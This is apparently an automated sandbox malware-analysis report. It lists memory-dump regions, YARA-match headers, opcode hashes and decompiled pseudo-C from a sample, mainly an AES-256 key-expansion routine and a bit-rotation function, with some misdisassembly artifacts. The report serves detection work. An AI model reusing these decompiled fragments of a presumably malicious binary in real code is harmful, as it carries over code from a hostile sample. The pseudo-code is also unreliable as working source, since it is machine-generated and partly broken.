                                                                                                                                                    0x0041c67c
                                                                                                                                                    0x0041c683
                                                                                                                                                    0x0041c683
                                                                                                                                                    0x0041c683
                                                                                                                                                    0x0041c694
                                                                                                                                                    0x0041c69b
                                                                                                                                                    0x0041c69e
                                                                                                                                                    0x0041c6b8
                                                                                                                                                    0x0041c6be
                                                                                                                                                    0x0041c6d0
                                                                                                                                                    0x0041c6d6
                                                                                                                                                    0x0041c6e5
                                                                                                                                                    0x0041c6ea
                                                                                                                                                    0x0041c6eb
                                                                                                                                                    0x0041c6f7
                                                                                                                                                    0x0041c709
                                                                                                                                                    0x0041c70f
                                                                                                                                                    0x0041c715
                                                                                                                                                    0x0041c71b
                                                                                                                                                    0x0041c71c
                                                                                                                                                    0x0041c725
                                                                                                                                                    0x0041c72c
                                                                                                                                                    0x0041c73e
                                                                                                                                                    0x0041c744
                                                                                                                                                    0x0041c74a
                                                                                                                                                    0x0041c74b
                                                                                                                                                    0x0041c74b
                                                                                                                                                    0x0041c757
                                                                                                                                                    0x0041c75d
                                                                                                                                                    0x0041c85c
                                                                                                                                                    0x0041c85c
                                                                                                                                                    0x0041c862
                                                                                                                                                    0x0041c863
                                                                                                                                                    0x0041c864
                                                                                                                                                    0x0041c86a
                                                                                                                                                    0x0041c86c
                                                                                                                                                    0x0041c86c
                                                                                                                                                    0x0041c856
                                                                                                                                                    0x0041c7c4

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9d058cfe2ba990bdce56f593fc40fe7effac11541c9a759078d0619f1f834f9e
                                                                                                                                                    • Instruction ID: 7783f60e8238d84215050eb48eaa1547aa99ec152cff665a18317cee5e717f8c
                                                                                                                                                    • Opcode Fuzzy Hash: 9d058cfe2ba990bdce56f593fc40fe7effac11541c9a759078d0619f1f834f9e
                                                                                                                                                    • Instruction Fuzzy Hash: DE81013284D3C5DFE711EF78D8DA6823FB1E75A320B08478AC8A15B1D2C37421AACB45
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 78c0f2ba0aaa544609cedf9d6384968bb60cc7abe00bee97c9f00710e08dd557
                                                                                                                                                    • Instruction ID: 642926e07c3ab215edeff5e85cda04715f4f30a7a4a5c207bc21585634528594
                                                                                                                                                    • Opcode Fuzzy Hash: 78c0f2ba0aaa544609cedf9d6384968bb60cc7abe00bee97c9f00710e08dd557
                                                                                                                                                    • Instruction Fuzzy Hash: 7C51FC7AF50A628BC718CF1ECC84128BBE2FB8A31571E8166DB59D7391C6708D42D7E4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 67%
                                                                                                                                                    			E00402D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
                                                                                                                                                    				signed int _t66;
                                                                                                                                                    				signed int* _t69;
                                                                                                                                                    				signed int* _t81;
                                                                                                                                                    				signed int _t94;
                                                                                                                                                    				signed int _t96;
                                                                                                                                                    				signed int _t106;
                                                                                                                                                    				signed int _t108;
                                                                                                                                                    				signed int* _t110;
                                                                                                                                                    				signed int _t127;
                                                                                                                                                    				signed int _t129;
                                                                                                                                                    				signed int _t133;
                                                                                                                                                    				signed int _t152;
                                                                                                                                                    				intOrPtr _t171;
                                                                                                                                                    
                                                                                                                                                    				_t81 = _a12;
                                                                                                                                                    				_t110 = _a8;
                                                                                                                                                    				asm("ror esi, 0x8");
                                                                                                                                                    				asm("rol eax, 0x8");
                                                                                                                                                    				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
                                                                                                                                                    				asm("ror edi, 0x8");
                                                                                                                                                    				asm("rol esi, 0x8");
                                                                                                                                                    				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
                                                                                                                                                    				asm("ror edi, 0x8");
                                                                                                                                                    				asm("rol esi, 0x8");
                                                                                                                                                    				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
                                                                                                                                                    				_t66 =  &(_t110[1]);
                                                                                                                                                    				asm("ror edi, 0x8");
                                                                                                                                                    				asm("rol esi, 0x8");
                                                                                                                                                    				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
                                                                                                                                                    				asm("ror edi, 0x8");
                                                                                                                                                    				asm("rol esi, 0x8");
                                                                                                                                                    				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
                                                                                                                                                    				asm("ror edi, 0x8");
                                                                                                                                                    				asm("rol esi, 0x8");
                                                                                                                                                    				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
                                                                                                                                                    				asm("ror edi, 0x8");
                                                                                                                                                    				asm("rol esi, 0x8");
                                                                                                                                                    				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
                                                                                                                                                    				asm("ror esi, 0x8");
                                                                                                                                                    				asm("rol ecx, 0x8");
                                                                                                                                                    				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
                                                                                                                                                    				if(_a16 != 0x100) {
                                                                                                                                                    					L4:
                                                                                                                                                    					return _t66 | 0xffffffff;
                                                                                                                                                    				} else {
                                                                                                                                                    					_t171 = _a4;
                                                                                                                                                    					_t69 = 0;
                                                                                                                                                    					_a12 = 0;
                                                                                                                                                    					while(1) {
                                                                                                                                                    						_t152 =  *(_t66 + 0x18);
                                                                                                                                                    						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
                                                                                                                                                    						_t127 =  *_t66 ^ _t94;
                                                                                                                                                    						 *(_t66 + 0x1c) = _t94;
                                                                                                                                                    						_t96 =  *(_t66 + 4) ^ _t127;
                                                                                                                                                    						 *(_t66 + 0x20) = _t127;
                                                                                                                                                    						_t129 =  *(_t66 + 8) ^ _t96;
                                                                                                                                                    						 *(_t66 + 0x24) = _t96;
                                                                                                                                                    						 *(_t66 + 0x28) = _t129;
                                                                                                                                                    						if(_t69 == 6) {
                                                                                                                                                    							break;
                                                                                                                                                    						}
                                                                                                                                                    						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
                                                                                                                                                    						_t133 =  *(_t66 + 0x10) ^ _t106;
                                                                                                                                                    						 *(_t66 + 0x2c) = _t106;
                                                                                                                                                    						_t108 =  *(_t66 + 0x14) ^ _t133;
                                                                                                                                                    						 *(_t66 + 0x34) = _t108;
                                                                                                                                                    						_t69 =  &(_a12[0]);
                                                                                                                                                    						 *(_t66 + 0x30) = _t133;
                                                                                                                                                    						 *(_t66 + 0x38) = _t108 ^ _t152;
                                                                                                                                                    						_t66 = _t66 + 0x20;
                                                                                                                                                    						_a12 = _t69;
                                                                                                                                                    						if(_t69 < 7) {
                                                                                                                                                    							continue;
                                                                                                                                                    						} else {
                                                                                                                                                    							goto L4;
                                                                                                                                                    						}
                                                                                                                                                    						goto L6;
                                                                                                                                                    					}
                                                                                                                                                    					return 0xe;
                                                                                                                                                    				}
                                                                                                                                                    				L6:
                                                                                                                                                    			}

















                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                                                    • Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
                                                                                                                                                    • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                                                    • Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 63%
                                                                                                                                                    			E00402D87(intOrPtr __eax, intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
                                                                                                                                                    				signed int _t67;
                                                                                                                                                    				signed int* _t72;
                                                                                                                                                    				signed int* _t85;
                                                                                                                                                    				signed int _t98;
                                                                                                                                                    				signed int _t100;
                                                                                                                                                    				signed int _t110;
                                                                                                                                                    				signed int _t112;
                                                                                                                                                    				signed int* _t114;
                                                                                                                                                    				signed int _t131;
                                                                                                                                                    				signed int _t133;
                                                                                                                                                    				signed int _t137;
                                                                                                                                                    				signed int _t158;
                                                                                                                                                    				intOrPtr _t180;
                                                                                                                                                    
                                                                                                                                                    				asm("lahf");
                                                                                                                                                    				asm("lock sahf");
                                                                                                                                                    				 *0x4b43394 = __eax;
                                                                                                                                                    				asm("enter 0x8b55, 0xec");
                                                                                                                                                    				_t85 = _a12;
                                                                                                                                                    				_t114 = _a8;
                                                                                                                                                    				asm("ror esi, 0x8");
                                                                                                                                                    				asm("rol eax, 0x8");
                                                                                                                                                    				 *_t114 =  *_t85 & 0xff00ff00 |  *_t85 & 0x00ff00ff;
                                                                                                                                                    				asm("ror edi, 0x8");
                                                                                                                                                    				asm("rol esi, 0x8");
                                                                                                                                                    				_t114[1] = _t85[1] & 0xff00ff00 | _t85[1] & 0x00ff00ff;
                                                                                                                                                    				asm("ror edi, 0x8");
                                                                                                                                                    				asm("rol esi, 0x8");
                                                                                                                                                    				_t114[2] = _t85[2] & 0xff00ff00 | _t85[2] & 0x00ff00ff;
                                                                                                                                                    				_t67 =  &(_t114[1]);
                                                                                                                                                    				asm("ror edi, 0x8");
                                                                                                                                                    				asm("rol esi, 0x8");
                                                                                                                                                    				_t114[3] = _t85[3] & 0xff00ff00 | _t85[3] & 0x00ff00ff;
                                                                                                                                                    				asm("ror edi, 0x8");
                                                                                                                                                    				asm("rol esi, 0x8");
                                                                                                                                                    				_t114[4] = _t85[4] & 0xff00ff00 | _t85[4] & 0x00ff00ff;
                                                                                                                                                    				asm("ror edi, 0x8");
                                                                                                                                                    				asm("rol esi, 0x8");
                                                                                                                                                    				_t114[5] = _t85[5] & 0xff00ff00 | _t85[5] & 0x00ff00ff;
                                                                                                                                                    				asm("ror edi, 0x8");
                                                                                                                                                    				asm("rol esi, 0x8");
                                                                                                                                                    				_t114[6] = _t85[6] & 0xff00ff00 | _t85[6] & 0x00ff00ff;
                                                                                                                                                    				asm("ror esi, 0x8");
                                                                                                                                                    				asm("rol ecx, 0x8");
                                                                                                                                                    				_t114[7] = _t85[7] & 0xff00ff00 | _t85[7] & 0x00ff00ff;
                                                                                                                                                    				if(_a16 != 0x100) {
                                                                                                                                                    					L5:
                                                                                                                                                    					return _t67 | 0xffffffff;
                                                                                                                                                    				} else {
                                                                                                                                                    					_t180 = _a4;
                                                                                                                                                    					_t72 = 0;
                                                                                                                                                    					_a12 = 0;
                                                                                                                                                    					while(1) {
                                                                                                                                                    						_t158 =  *(_t67 + 0x18);
                                                                                                                                                    						_t98 = ( *(_t180 + 4 + (_t158 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t180 +  &(_t72[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t180 + 4 + (_t158 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t180 + 5 + (_t158 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t180 + 4 + (_t158 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t67 - 4);
                                                                                                                                                    						_t131 =  *_t67 ^ _t98;
                                                                                                                                                    						 *(_t67 + 0x1c) = _t98;
                                                                                                                                                    						_t100 =  *(_t67 + 4) ^ _t131;
                                                                                                                                                    						 *(_t67 + 0x20) = _t131;
                                                                                                                                                    						_t133 =  *(_t67 + 8) ^ _t100;
                                                                                                                                                    						 *(_t67 + 0x24) = _t100;
                                                                                                                                                    						 *(_t67 + 0x28) = _t133;
                                                                                                                                                    						if(_t72 == 6) {
                                                                                                                                                    							break;
                                                                                                                                                    						}
                                                                                                                                                    						_t110 = ( *(_t180 + 4 + (_t133 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t180 + 4 + (_t133 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t180 + 4 + (_t133 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t180 + 5 + (_t133 & 0x000000ff) * 4) & 0x000000ff ^  *(_t67 + 0xc);
                                                                                                                                                    						_t137 =  *(_t67 + 0x10) ^ _t110;
                                                                                                                                                    						 *(_t67 + 0x2c) = _t110;
                                                                                                                                                    						_t112 =  *(_t67 + 0x14) ^ _t137;
                                                                                                                                                    						 *(_t67 + 0x34) = _t112;
                                                                                                                                                    						_t72 =  &(_a12[0]);
                                                                                                                                                    						 *(_t67 + 0x30) = _t137;
                                                                                                                                                    						 *(_t67 + 0x38) = _t112 ^ _t158;
                                                                                                                                                    						_t67 = _t67 + 0x20;
                                                                                                                                                    						_a12 = _t72;
                                                                                                                                                    						if(_t72 < 7) {
                                                                                                                                                    							continue;
                                                                                                                                                    						} else {
                                                                                                                                                    							goto L5;
                                                                                                                                                    						}
                                                                                                                                                    						goto L7;
                                                                                                                                                    					}
                                                                                                                                                    					return 0xe;
                                                                                                                                                    				}
                                                                                                                                                    				L7:
                                                                                                                                                    			}

















                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • Opcode ID: b77524f73f5b9725c8b0c48ab09b6d7829959503bc25e6c4dad20ad73f39825c
                                                                                                                                                    • Instruction ID: 0fc73d52f4632706d1a62dacb6e6cef9c5f73211cbf1d7611aeb4f59dec370e7
                                                                                                                                                    • Opcode Fuzzy Hash: b77524f73f5b9725c8b0c48ab09b6d7829959503bc25e6c4dad20ad73f39825c
                                                                                                                                                    • Instruction Fuzzy Hash: 265171B3E14A214BD318CF09CD40631B692FFD8312B5B81BEDD199B397CA74A9529A90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • Opcode ID: c5218c2c5f4ec00761a8d98bd9cd92bdf86b610b9cee489442477253928efef8
                                                                                                                                                    • Instruction ID: ca6f69f0b3ed1cf736fbb6ba242ea624eea2035fdcf02bdc13be368b69647999
                                                                                                                                                    • Opcode Fuzzy Hash: c5218c2c5f4ec00761a8d98bd9cd92bdf86b610b9cee489442477253928efef8
                                                                                                                                                    • Instruction Fuzzy Hash: 164112712046659FD72C8F22C8A9F7733E9EB06351F14841EF99B8B591DB30A941E720
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00401030(signed char* __eax) {
                                                                                                                                                    				signed char* _t37;
                                                                                                                                                    				unsigned int _t65;
                                                                                                                                                    				unsigned int _t73;
                                                                                                                                                    				unsigned int _t81;
                                                                                                                                                    				unsigned int _t88;
                                                                                                                                                    				signed char _t94;
                                                                                                                                                    				signed char _t97;
                                                                                                                                                    				signed char _t100;
                                                                                                                                                    
                                                                                                                                                    				_t37 = __eax;
                                                                                                                                                    				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
                                                                                                                                                    				_t94 = __eax[0xb];
                                                                                                                                                    				if((_t94 & 0x00000001) != 0) {
                                                                                                                                                    					_t65 = _t65 | 0x80000000;
                                                                                                                                                    				}
                                                                                                                                                    				_t37[0xc] = _t65 >> 0x18;
                                                                                                                                                    				_t37[0xf] = _t65;
                                                                                                                                                    				_t37[0xd] = _t65 >> 0x10;
                                                                                                                                                    				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
                                                                                                                                                    				_t97 = _t37[7];
                                                                                                                                                    				_t37[0xe] = _t65 >> 8;
                                                                                                                                                    				if((_t97 & 0x00000001) != 0) {
                                                                                                                                                    					_t73 = _t73 | 0x80000000;
                                                                                                                                                    				}
                                                                                                                                                    				_t37[8] = _t73 >> 0x18;
                                                                                                                                                    				_t37[0xb] = _t73;
                                                                                                                                                    				_t37[9] = _t73 >> 0x10;
                                                                                                                                                    				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
                                                                                                                                                    				_t100 = _t37[3];
                                                                                                                                                    				_t37[0xa] = _t73 >> 8;
                                                                                                                                                    				if((_t100 & 0x00000001) != 0) {
                                                                                                                                                    					_t81 = _t81 | 0x80000000;
                                                                                                                                                    				}
                                                                                                                                                    				_t37[4] = _t81 >> 0x18;
                                                                                                                                                    				_t37[7] = _t81;
                                                                                                                                                    				_t37[5] = _t81 >> 0x10;
                                                                                                                                                    				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
                                                                                                                                                    				 *_t37 = _t88 >> 0x18;
                                                                                                                                                    				_t37[1] = _t88 >> 0x10;
                                                                                                                                                    				_t37[6] = _t81 >> 8;
                                                                                                                                                    				_t37[2] = _t88 >> 8;
                                                                                                                                                    				_t37[3] = _t88;
                                                                                                                                                    				return _t37;
                                                                                                                                                    			}












                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                                                    • Instruction ID: 9ce4faf4bd6c29c48d5e9242fd1ccb7de96948774e055271f7c113e60250bd75
                                                                                                                                                    • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                                                    • Instruction Fuzzy Hash: 203180116596F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                                                                    • Instruction ID: d15a80ac3b02d16992dd1f111c328089c3d9e72c5b2ba8512269c2ef418b22b0
                                                                                                                                                    • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                                                                    • Instruction Fuzzy Hash: 9AF0C231324559ABDB5CEA18DE91A6A33D5EB94340F64C079ED5DC7251E631DF408290
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2dd6100c5a868bce8079481a17e28f418926f3a136d9af693da5e4b36cd35e82
                                                                                                                                                    • Instruction ID: 2f919227d1cda467263c9defd713387e7cae624df787944073078084a1c825f2
                                                                                                                                                    • Opcode Fuzzy Hash: 2dd6100c5a868bce8079481a17e28f418926f3a136d9af693da5e4b36cd35e82
                                                                                                                                                    • Instruction Fuzzy Hash: 11E09AB5544B81CBD310DF14C900B1AB3F4FF89B10F20083AF805C7790D7789A09CA56
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                                                                                                                    • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                                                                                                                    • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                                                                                                                    • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                                                                    • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                                                                                                                    • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                                                                    • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                                                                                    • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                                                                                                                    • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                                                                                    • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
